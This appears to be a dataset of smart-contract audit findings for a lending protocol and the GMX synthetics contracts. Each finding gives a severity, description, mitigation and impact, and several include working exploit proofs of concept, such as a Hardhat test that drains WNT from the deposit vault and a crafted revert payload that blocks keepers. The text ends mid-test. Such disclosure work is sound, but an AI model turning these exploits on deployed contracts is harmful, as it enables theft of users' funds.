By inflating the number of provisions with their own provisions then can cause legitimate lenders to receive a much lower interest rate than intended.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nIf a loan is paid back before the minimal interest rate has been reached then each provision will receive the unweighted minimal interest amount. This can be abused to take loans that pay legitimate lenders a lower APR than expected, cheating them of their yield.\\nExample: A user wishes to borrow 1000 USDC at 10% APR. Assume the minimal interest per provision is 10 USDC and minimum borrow amount is 20 USDC. After 1 year the user would owe 100 USDC in interest. A user can abuse the minimum to pay legitimate lenders much lower than 10% APR. The attacker will find a legitimate offer to claim 820 USDC. This will create an offer for themselves and borrow 20 USDC from it 9 times. This creates a total of 10 provisions each owed a minimum of 10 USDC or 100 USDC total. Now after 1 year they owe 100 USDC on their loan and the repay the loan. Since 100 USDC is the minimum, each of the 10 provisions will get their minimal interest. 90 USDC will go to their provisions and 10 will go to the legitimate user who loaned them a majority of the USDC. 
Their APR is ~1.2% which is ~1/9th of what they specified.чThe relative size of the provisions should be enforced so that one is not much larger than any other oneчLegitimate users can be cheated out of interest owedч```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent;\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n -minOfferCost can be bypassed in certain scenariosчmediumчminOfferCost is designed to prevent spam loan requests that can cause the lender to have positions that cost more gas to claim than interest. Due to how interest is calculated right after this minimum is passed it is still possible for the lender to receive less than the minimum.\\nClaimFacet.sol#L94-L106\\n```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. 
The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n\\nWhen a loan has generated more than the minimum interest amount the method for calculating the interest paid is different and depending on the size of the provisions it may lead to provisions that are under the guaranteed minimum.\\nExample: Assume the minimum interest is 1e18. A loan is filled with 2 provisions. The first provision is 25% and the second is 75%. Since there are two loans the total minimum interest for the loan is 2e18. After some time the paid interest reaches 2.001e18 and the loan is paid back. Since it is above the minimum interest rate, it is paid out proportionally. This gives 0.5e18 to the first provision and 1.5e18 to the second provision. This violates the minimum guaranteed interest amount.чMinimum interest should be set based on the percentage of the lowest provision and provision shouldn't be allowed to be lower than some amount. Since this problem occurs when the percentage is less than 1/n (where n is the number of provisions), any single provision should be allowed to be lower than 1/(2n).чMinimum interest guarantee can be violatedч```\\nfunction sendInterests(Loan storage loan, Provision storage provision) internal returns (uint256 sent) {\\n uint256 interests = loan.payment.paid - loan.lent;\\n if (interests == loan.payment.minInterestsToRepay) {\\n // this is the case if the loan is repaid shortly after issuance\\n // each lender gets its minimal interest, as an anti ddos measure to spam offer\\n sent = provision.amount + (interests / loan.nbOfPositions);\\n } else {\\n /* provision.amount / lent = share of the interests belonging to the lender. 
The parenthesis make the\\n calculus in the order that maximizes precison */\\n sent = provision.amount + (interests * (provision.amount)) / loan.lent; <- audit-issue minimal interest isn't guaranteed\\n }\\n loan.assetLent.checkedTransfer(msg.sender, sent);\\n}\\n```\\n -Incomplete error handling causes execution and freezing/cancelling of Deposits/Withdrawals/Orders to fail.чhighчUsers can define callbacks for Deposits/Withdrawals/Orders execution and cancellations. The GMX protocol attempts to manage errors during the execution of the callbacks.\\nA user-controlled callback can return a specially crafted revert reason that will make the error handling revert.\\nBy making the execution and cancellation revert, a malicious actor can game orders and waste keeper gas.\\nThe bug resides in ErrorUtils's `getRevertMessage`, which is called on every callback attempt. Example of deposit callback:\\n```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n\\nAs can be seen in the above snippet, the `reasonBytes` from the catch statement is passed to `getRevertMessage`, which tries to extract the `Error(string)` message from the revert. The issue is that the data extracted from the revert can be crafted to revert on `abi.decode`.\\nI will elaborate: Correct (expected) revert data looks as follows: 1st 32 bytes: 0x000..64 (bytes memory size) 2nd 32 bytes: 0x08c379a0 (Error(string) selector) 3rd 32 bytes: offset to data 4th 32 bytes: length of data 5th 32 bytes: data\\n`abi.decode` reverts if the data is not structured correctly.
There can be two reasons for revert:\\nif the 3rd 32 bytes (offset to data) is larger than the uint64 (0xffffffffffffffff)\\nSimplified yul: `if gt(offset, 0xffffffffffffffff) { revert }`\\nif the 3rd 32 bytes (offset to data) is larger than the uint64 of the encoded data, the call will revert\\nSimplified yul: `if iszero(slt(add(offset, 0x1f), size) { revert }`\\nBy reverting with the following data in the callback, the `getRevertMessage` will revert: 0x000....64 0x0x08c379a0...000 0xffffffffffffffff....000 0x000...2 0x4141чWhen parsing the revert reason, validate that the offsets are smaller than the length of the encoding.чThere are two impacts that will occur when the error handling reverts:\\n(1) Orders can be gamed\\nSince the following callbacks are controlled by the user:\\n`afterOrderExecution`\\n`afterOrderCancellation`\\n`afterOrderFrozen`\\nThe user can decide when to send the malformed revert data and when not. Essentially preventing keepers from freezing orders and from executing orders until it fits the attacker.\\nThere are two ways to game the orders:\\nAn attacker can create a risk-free order, by setting a long increase order. If the market increases in his favor, he can decide to \"unblock\" the execution and receive profit. If the market decreases, he can cancel the order or wait for the right timing.\\nAn attacker can create a limit order with a size larger than what is available in the pool. The attacker waits for the price to hit and then deposits into the pool to make the transaction work. This method is supposed to be prevented by freezing orders, but since the attacker can make the `freezeOrder` revert, the scenario becomes vulnerable again.\\n(2) drain keepers' funds\\nSince exploiting the bug for both execution and cancellation, keepers will ALWAYS revert when trying to execute Deposits/Withdrawals/Orders. The protocol promises to always pay keepers at least the execution cost.
By making the execution and cancellations revert the Deposits/Withdrawals/Orders will never be removed from the store and keepers transactions will keep reverting until potentially all their funds are wasted.ч```\\ntry IDepositCallbackReceiver(deposit.callbackContract()).afterDepositExecution{ gas: deposit.callbackGasLimit() }(key, deposit) {\\n } catch (bytes memory reasonBytes) {\\n (string memory reason, /* bool hasRevertMessage */) = ErrorUtils.getRevertMessage(reasonBytes);\\n emit AfterDepositExecutionError(key, deposit, reason, reasonBytes);\\n }\\n```\\n -Keeper can make deposits/orders/withdrawals fail and receive fee+rewardsчmediumчMalicious keeper can make execution of deposits/orders/withdrawals fail by providing limited gas to the execution.\\nIf enough gas is sent for the cancellation to succeed but for the execution to fail the keeper is able to receive the execution fee + incentive rewards and cancel all deposits/orders/withdrawals.\\n```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n\\nFor the attack to succeed, the keeper needs to make `this._executeDeposit` revert. 
Due to the 63/64 rule the attack will succeed if both of the following conditions are met:\\n63/64 of the supplied gas will cause an out of gas in the `try` statement\\n1/64 of the supplied gas is enough to execute the `catch` statement.\\nConsidering `2000000` is the max callback limit and the native token transfer gas limit is large enough to support contracts, the above conditions can be met.чAdd a buffer of gas that needs to be supplied to the execute function to make sure the `try` statement will not revert because of out of gas.чKeeper can remove all deposits/withdrawals/orders from the protocol.\\nEssentially stealing all execution fees paid\\nKeeper can create deposits and by leveraging the bug can cancel them when executing while receiving rewards.\\nVaults will be drainedч```\\nfunction executeDeposit(\\n bytes32 key,\\n OracleUtils.SetPricesParams calldata oracleParams\\n ) external\\n globalNonReentrant\\n onlyOrderKeeper\\n withOraclePrices(oracle, dataStore, eventEmitter, oracleParams)\\n {\\n uint256 startingGas = gasleft();\\n\\n try this._executeDeposit(\\n key,\\n oracleParams,\\n msg.sender,\\n startingGas\\n ) {\\n } catch (bytes memory reasonBytes) {\\n _handleDepositError(\\n key,\\n startingGas,\\n reasonBytes\\n );\\n }\\n }\\n```\\n -WNT in depositVault can be drained by abusing initialLongToken/initialShortToken of CreateDepositParamsчhighчThe attacker can abuse the initialLongToken/initialShortToken of `CreateDepositParams` to drain all the WNT from depositVault.\\n```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n
address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n\\nThe `initialLongToken` and `initialShortToken` of `CreateDepositParams` can be set to any token address and there is no check for the `initialLongToken` and `initialShortToken` during `createDeposit`. The attacker can set initialLongToken/initialShortToken to a token(USDC e.g.) with less value per unit than WNT and for a market with `market.longToken == wnt` or `market.shortToken == wnt`, `params.executionFee` will be wrongly subtracted from `initialLongTokenAmount` or `initialLongTokenAmount`. This allows the attacker to have a controllable large `params.executionFee` by sending tokens with less value. By calling `cancelDeposit`, `params.executionFee` amount of WNT will be repaid to the attacker.\\nHere is a PoC test case that drains WNT from depositVault:\\n```\\ndiff --git a/gmx-synthetics/test/router/ExchangeRouter.ts b/gmx-synthetics/test/router/ExchangeRouter.ts\\nindex 7eca238..c40a71c 100644\\n--- a/gmx-synthetics/test/router/ExchangeRouter.ts\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx-synthetics/test/router/ExchangeRouter.ts\\n@@ -103,6 // Add the line below\\n103,82 @@ describe(\"ExchangeRouter\", () => {\\n });\\n });\\n \\n// Add the line below\\n it(\"createDepositPoC\", async () => {\\n// Add the line below\\n // simulate normal user deposit\\n// Add the line below\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n await usdc.connect(user0).approve(router.address, expandDecimals(50 * 1000, 6));\\n// Add the line below\\n const tx = await exchangeRouter.connect(user0).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"sendWnt\", [depositVault.address, expandDecimals(11, 18)]),\\n// Add 
the line below\\n exchangeRouter.interface.encodeFunctionData(\"sendTokens\", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n expandDecimals(50 * 1000, 6),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"createDeposit\", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user0.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: ethUsdMarket.longToken,\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [ethUsdMarket.marketToken, ethUsdSpotOnlyMarket.marketToken],\\n// Add the line below\\n shortTokenSwapPath: [ethUsdSpotOnlyMarket.marketToken, ethUsdMarket.marketToken],\\n// Add the line below\\n minMarketTokens: 100,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee,\\n// Add the line below\\n callbackGasLimit: \"200000\",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n { value: expandDecimals(11, 18) }\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // depositVault has WNT balance now\\n// Add the line below\\n let vaultWNTBalance = await wnt.balanceOf(depositVault.address);\\n// Add the line below\\n expect(vaultWNTBalance.eq(expandDecimals(11, 18)));\\n// Add the line below\\n\\n// Add the line below\\n // user1 steal WNT from depositVault\\n// Add the line below\\n await usdc.mint(user1.address, vaultWNTBalance.add(1));\\n// Add the line below\\n await usdc.connect(user1).approve(router.address, vaultWNTBalance.add(1));\\n// Add the line below\\n\\n// Add the line below\\n // Step 1. 
create deposit with malicious initialLongToken\\n// Add the line below\\n await exchangeRouter.connect(user1).multicall(\\n// Add the line below\\n [\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"sendTokens\", [\\n// Add the line below\\n usdc.address,\\n// Add the line below\\n depositVault.address,\\n// Add the line below\\n vaultWNTBalance.add(1),\\n// Add the line below\\n ]),\\n// Add the line below\\n exchangeRouter.interface.encodeFunctionData(\"createDeposit\", [\\n// Add the line below\\n {\\n// Add the line below\\n receiver: user1.address,\\n// Add the line below\\n callbackContract: user2.address,\\n// Add the line below\\n market: ethUsdMarket.marketToken,\\n// Add the line below\\n initialLongToken: usdc.address, // use usdc instead of WNT\\n// Add the line below\\n initialShortToken: ethUsdMarket.shortToken,\\n// Add the line below\\n longTokenSwapPath: [],\\n// Add the line below\\n shortTokenSwapPath: [],\\n// Add the line below\\n minMarketTokens: 0,\\n// Add the line below\\n shouldUnwrapNativeToken: true,\\n// Add the line below\\n executionFee: vaultWNTBalance,\\n// Add the line below\\n callbackGasLimit: \"0\",\\n// Add the line below\\n },\\n// Add the line below\\n ]),\\n// Add the line below\\n ],\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // Step 2. 
cancel deposit to drain WNT\\n// Add the line below\\n const depositKeys = await getDepositKeys(dataStore, 0, 2);\\n// Add the line below\\n // const deposit = await reader.getDeposit(dataStore.address, depositKeys[1]);\\n// Add the line below\\n // console.log(deposit);\\n// Add the line below\\n // console.log(depositKeys[1]);\\n// Add the line below\\n await expect(exchangeRouter.connect(user1).cancelDeposit(depositKeys[1]));\\n// Add the line below\\n\\n// Add the line below\\n // WNT is drained from depositVault\\n// Add the line below\\n expect(await wnt.balanceOf(depositVault.address)).eq(0);\\n// Add the line below\\n });\\n// Add the line below\\n\\n it(\"createOrder\", async () => {\\n const referralCode = hashString(\"referralCode\");\\n await usdc.mint(user0.address, expandDecimals(50 * 1000, 6));\\n```\\nч```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\nindex fae1b46..2811a6d 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/gmx// Remove the line below\\nsynthetics/contracts/deposit/DepositUtils.sol\\n@@ // Remove the line below\\n74,9 // Add the line below\\n74,9 @@ library DepositUtils {\\n \\n address wnt = TokenUtils.wnt(dataStore);\\n \\n// Remove the line below\\n if (market.longToken == wnt) {\\n// Add the line below\\n if (params.initialLongToken == wnt) {\\n initialLongTokenAmount // Remove the line below\\n= params.executionFee;\\n// Remove the line below\\n } else if (market.shortToken == wnt) {\\n// Add the line below\\n } else if (params.initialShortToken == wnt) {\\n initialShortTokenAmount // Remove the line below\\n= params.executionFee;\\n } else {\\n uint256 wntAmount 
= depositVault.recordTransferIn(wnt);\\n```\\nчThe malicious user can drain all WNT from depositVault.ч```\\n function createDeposit(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n DepositVault depositVault,\\n address account,\\n CreateDepositParams memory params\\n ) external returns (bytes32) {\\n Market.Props memory market = MarketUtils.getEnabledMarket(dataStore, params.market);\\n\\n uint256 initialLongTokenAmount = depositVault.recordTransferIn(params.initialLongToken);\\n uint256 initialShortTokenAmount = depositVault.recordTransferIn(params.initialShortToken);\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n if (market.longToken == wnt) {\\n initialLongTokenAmount -= params.executionFee;\\n } else if (market.shortToken == wnt) {\\n initialShortTokenAmount -= params.executionFee;\\n```\\n -Incorrect function call leads to stale borrowing feesчhighчDue to an incorrect function call while getting the total borrow fees, the returned fees will be an inaccurate and stale amount. Which will have an impact on liquidity providers\\nAs said the function getTotalBorrowingFees:\\n```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n\\ncalculates the fess by calling getCumulativeBorrowingFactor(...):\\nwhich is the wrong function to call because it returns a stale borrowing factor. 
To get the actual borrowing factor and calculate correctly the borrowing fees, GMX should call the `getNextCumulativeBorrowingFactor` function:\\nWhich makes the right calculation, taking into account the stale fees also:\\n```\\n uint256 durationInSeconds = getSecondsSinceCumulativeBorrowingFactorUpdated(dataStore, market.marketToken, isLong);\\n uint256 borrowingFactorPerSecond = getBorrowingFactorPerSecond(\\n dataStore,\\n market,\\n prices,\\n isLong\\n );\\n\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market.marketToken, isLong);\\n\\n uint256 delta = durationInSeconds * borrowingFactorPerSecond;\\n uint256 nextCumulativeBorrowingFactor = cumulativeBorrowingFactor + delta;\\n return (nextCumulativeBorrowingFactor, delta);\\n```\\nчIn order to mitigate the issue, call the function `getNextCumulativeBorrowingFactor` instead of the function `getCumulativeBorrowingFactor()` for a correct accounting and not getting stale feesчAs fee calculation will not be accurate, liquidity providers will have a less valuable token because pending fees are not accounted for in the pool's valueч```\\nfunction getTotalBorrowingFees(DataStore dataStore, address market, address longToken, address shortToken, bool isLong) internal view returns (uint256) {\\n uint256 openInterest = getOpenInterest(dataStore, market, longToken, shortToken, isLong);\\n uint256 cumulativeBorrowingFactor = getCumulativeBorrowingFactor(dataStore, market, isLong);\\n uint256 totalBorrowing = getTotalBorrowing(dataStore, market, isLong);\\n return openInterest * cumulativeBorrowingFactor - totalBorrowing;\\n}\\n```\\n -Limit orders can be used to get a free look into the futureчhighчUsers can continually update their orders to get a free look into prices in future blocks\\nOrder execution relies on signed archived prices from off-chain oracles, where each price is stored along with the block range it applies to, and limit orders are only allowed to execute with oracle prices
where the block is greater than the block in which the order was last updated. Since prices are required to be future prices, there is a time gap between when the last signed price was archived, and the new price for the next block is stored in the archive, and the order keeper is able to fetch it and submit an execution for it in the next block.\\nThe example given by the sponsor in discord was:\\n```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\nчRequire a delay between when the order was last increased/submitted, and when an update is allowed, similar to REQUEST_EXPIRATION_BLOCK_AGE for the cancellation of market ordersчIf a user has a pending exit order that was submitted a block N, and the user sees that the price at block N+1 will be more favorable, they can update their exit order, changing the amount by +/- 1 wei, and have the order execution delayed until the next block, at which point they can decided again whether the price and or impact is favorable, and whether to exit. In the sponsor's example, if the order was submitted at block 101, they have until block 105 to decide whether to update their order, since the order execution keeper won't be able to do the execution until block 106. 
There is a gas cost for doing such updates, but if the position is large enough, or the price is gapping enough, it is worthwhile to do this, especially if someone comes up with an automated service that does this on your behalf.\\nThe more favorable price for the attacker is at the expense of the other side of the trade, and is a loss of capital for them.ч```\\nthe oracle process:\\n\\n1. the oracle node checks the latest price from reference exchanges and stores it with the oracle node's timestamp, e.g. time: 1000\\n2. the oracle node checks the latest block of the blockchain, e.g. block 100, it stores this with the oracle node's timestamp as well\\n3. the oracle node signs minOracleBlockNumber: 100, maxOracleBlockNumber: 100, timestamp: 1000, price: \\n4. the next time the loop runs is at time 1001, if the latest block of the blockchain is block 105, e.g. if 5 blocks were produced in that one second, then the oracle would sign\\nminOracleBlockNumber: 101, maxOracleBlockNumber: 105, timestamp: 1001, price: \\n```\\n -Creating an order of type MarketIncrease opens an attack vector where an attacker can execute txs with stale prices by inputting a very extensive swapPathчhighчThe vulnerability relies on the create order function:\\n```\\n function createOrder(\\n DataStore dataStore,\\n EventEmitter eventEmitter,\\n OrderVault orderVault,\\n IReferralStorage referralStorage,\\n address account,\\n BaseOrderUtils.CreateOrderParams memory params\\n ) external returns (bytes32) {\\n ReferralUtils.setTraderReferralCode(referralStorage, account, params.referralCode);\\n\\n uint256 initialCollateralDeltaAmount;\\n\\n address wnt = TokenUtils.wnt(dataStore);\\n\\n bool shouldRecordSeparateExecutionFeeTransfer = true;\\n\\n if (\\n params.orderType == Order.OrderType.MarketSwap ||\\n params.orderType == Order.OrderType.LimitSwap ||\\n params.orderType == Order.OrderType.MarketIncrease ||\\n params.orderType == Order.OrderType.LimitIncrease\\n ) {\\n 
initialCollateralDeltaAmount = orderVault.recordTransferIn(params.addresses.initialCollateralToken);\\n if (params.addresses.initialCollateralToken == wnt) {\\n if (initialCollateralDeltaAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(initialCollateralDeltaAmount, params.numbers.executionFee);\\n }\\n initialCollateralDeltaAmount -= params.numbers.executionFee;\\n shouldRecordSeparateExecutionFeeTransfer = false;\\n }\\n } else if (\\n params.orderType == Order.OrderType.MarketDecrease ||\\n params.orderType == Order.OrderType.LimitDecrease ||\\n params.orderType == Order.OrderType.StopLossDecrease\\n ) {\\n initialCollateralDeltaAmount = params.numbers.initialCollateralDeltaAmount;\\n } else {\\n revert OrderTypeCannotBeCreated(params.orderType);\\n }\\n\\n if (shouldRecordSeparateExecutionFeeTransfer) {\\n uint256 wntAmount = orderVault.recordTransferIn(wnt);\\n if (wntAmount < params.numbers.executionFee) {\\n revert InsufficientWntAmountForExecutionFee(wntAmount, params.numbers.executionFee);\\n }\\n\\n GasUtils.handleExcessExecutionFee(\\n dataStore,\\n orderVault,\\n wntAmount,\\n params.numbers.executionFee\\n );\\n }\\n\\n // validate swap path markets\\n MarketUtils.getEnabledMarkets(\\n dataStore,\\n params.addresses.swapPath\\n );\\n\\n Order.Props memory order;\\n\\n order.setAccount(account);\\n order.setReceiver(params.addresses.receiver);\\n order.setCallbackContract(params.addresses.callbackContract);\\n order.setMarket(params.addresses.market);\\n order.setInitialCollateralToken(params.addresses.initialCollateralToken);\\n order.setSwapPath(params.addresses.swapPath);\\n order.setOrderType(params.orderType);\\n order.setDecreasePositionSwapType(params.decreasePositionSwapType);\\n order.setSizeDeltaUsd(params.numbers.sizeDeltaUsd);\\n order.setInitialCollateralDeltaAmount(initialCollateralDeltaAmount);\\n order.setTriggerPrice(params.numbers.triggerPrice);\\n 
order.setAcceptablePrice(params.numbers.acceptablePrice);\\n order.setExecutionFee(params.numbers.executionFee);\\n order.setCallbackGasLimit(params.numbers.callbackGasLimit);\\n order.setMinOutputAmount(params.numbers.minOutputAmount);\\n order.setIsLong(params.isLong);\\n order.setShouldUnwrapNativeToken(params.shouldUnwrapNativeToken);\\n\\n ReceiverUtils.validateReceiver(order.receiver());\\n\\n if (order.initialCollateralDeltaAmount() == 0 && order.sizeDeltaUsd() == 0) {\\n revert BaseOrderUtils.EmptyOrder();\\n }\\n\\n CallbackUtils.validateCallbackGasLimit(dataStore, order.callbackGasLimit());\\n\\n uint256 estimatedGasLimit = GasUtils.estimateExecuteOrderGasLimit(dataStore, order);\\n GasUtils.validateExecutionFee(dataStore, estimatedGasLimit, order.executionFee());\\n\\n bytes32 key = NonceUtils.getNextKey(dataStore);\\n\\n order.touch();\\n OrderStoreUtils.set(dataStore, key, order);\\n\\n OrderEventUtils.emitOrderCreated(eventEmitter, key, order);\\n\\n return key;\\n}\\n```\\n\\nSpecifically, on a marketIncrease OrderType. 
Executing an order type of marketIncrease opens an attack path where you can execute transactions with stale prices.\\nThe way to achieve this, is by creating a market increase order and passing a very extensive swapPath in params:\\n```\\n BaseOrderUtils.CreateOrderParams memory params\\n\\n\\n struct CreateOrderParams {\\n CreateOrderParamsAddresses addresses;\\n CreateOrderParamsNumbers numbers;\\n Order.OrderType orderType;\\n Order.DecreasePositionSwapType decreasePositionSwapType;\\n bool isLong;\\n bool shouldUnwrapNativeToken;\\n bytes32 referralCode;\\n }\\n\\n struct CreateOrderParamsAddresses {\\n address receiver;\\n address callbackContract;\\n address market;\\n address initialCollateralToken;\\n address[] swapPath; //HEREE <--------------------------------------------------------\\n }\\n\\nThe swap path has to be as long as it gets close to the gasLimit of the block.\\n```\\n\\nAfter calling marketIncrease close to gasLimit then using the callback contract that you passed as a param in:\\nan exceeding the block.gasLimit in the callback.\\nAfter \"x\" amount of blocks, change the gasUsage on the fallback, just that the transaction executes at the prior price.\\nPoC on how to execute the transaction with old pricing:\\n```\\nimport { expect } from \"chai\";\\nimport { mine } from \"@nomicfoundation/hardhat-network-helpers\";\\nimport { OrderType, getOrderCount, getOrderKeys, createOrder, executeOrder, handleOrder } from \"../utils/order\";\\nimport { expandDecimals, decimalToFloat } from \"../utils/math\";\\nimport { deployFixture } from \"../utils/fixture\";\\n import { handleDeposit } from \"../utils/deposit\";\\nimport { getPositionCount, getAccountPositionCount } from \"../utils/position\";\\n\\ndescribe(\"Execute transaction with all prices\", () => {\\nlet 
fixture,\\nuser0,\\nuser1,\\nuser2,\\nreader,\\ndataStore,\\nethUsdMarket,\\nethUsdSpotOnlyMarket,\\nwnt,\\nusdc,\\nattackContract,\\noracle,\\ndepositVault,\\nexchangeRouter,\\nswapHandler,\\nexecutionFee;\\n\\n beforeEach(async () => {\\n fixture = await deployFixture();\\n\\n ({ user0, user1, user2 } = fixture.accounts);\\n ({\\n reader,\\n dataStore,\\n oracle,\\n depositVault,\\n ethUsdMarket,\\n ethUsdSpotOnlyMarket,\\n wnt,\\n usdc,\\n attackContract,\\n exchangeRouter,\\n swapHandler,\\n } = fixture.contracts);\\n ({ executionFee } = fixture.props);\\n\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n await handleDeposit(fixture, {\\n create: {\\n market: ethUsdSpotOnlyMarket,\\n longTokenAmount: expandDecimals(10000000, 18),\\n shortTokenAmount: expandDecimals(10000000 * 5000, 6),\\n },\\n });\\n });\\n\\n it(\"Old price order execution\", async () => {\\n const path = [];\\n const UsdcBal = expandDecimals(50 * 1000, 6);\\n expect(await getOrderCount(dataStore)).eq(0);\\n\\n for (let i = 0; i < 63; i++) {\\n if (i % 2 == 0) path.push(ethUsdMarket.marketToken);\\n else path.push(ethUsdSpotOnlyMarket.marketToken);\\n }\\n\\n const params = {\\n account: attackContract,\\n callbackContract: attackContract,\\n callbackGasLimit: 1900000,\\n market: ethUsdMarket,\\n minOutputAmount: 0,\\n initialCollateralToken: usdc, // Collateral will get swapped to ETH by the swapPath -- 50k/$5k = 10 ETH Collateral\\n initialCollateralDeltaAmount: UsdcBal,\\n swapPath: path,\\n sizeDeltaUsd: decimalToFloat(200 * 1000), // 4x leverage -- position size is 40 ETH\\n acceptablePrice: expandDecimals(5001, 12),\\n orderType: OrderType.MarketIncrease,\\n isLong: true,\\n shouldUnwrapNativeToken: false,\\n gasUsageLabel: \"createOrder\",\\n };\\n\\n // Create a MarketIncrease order that will run out of gas doing callback\\n await 
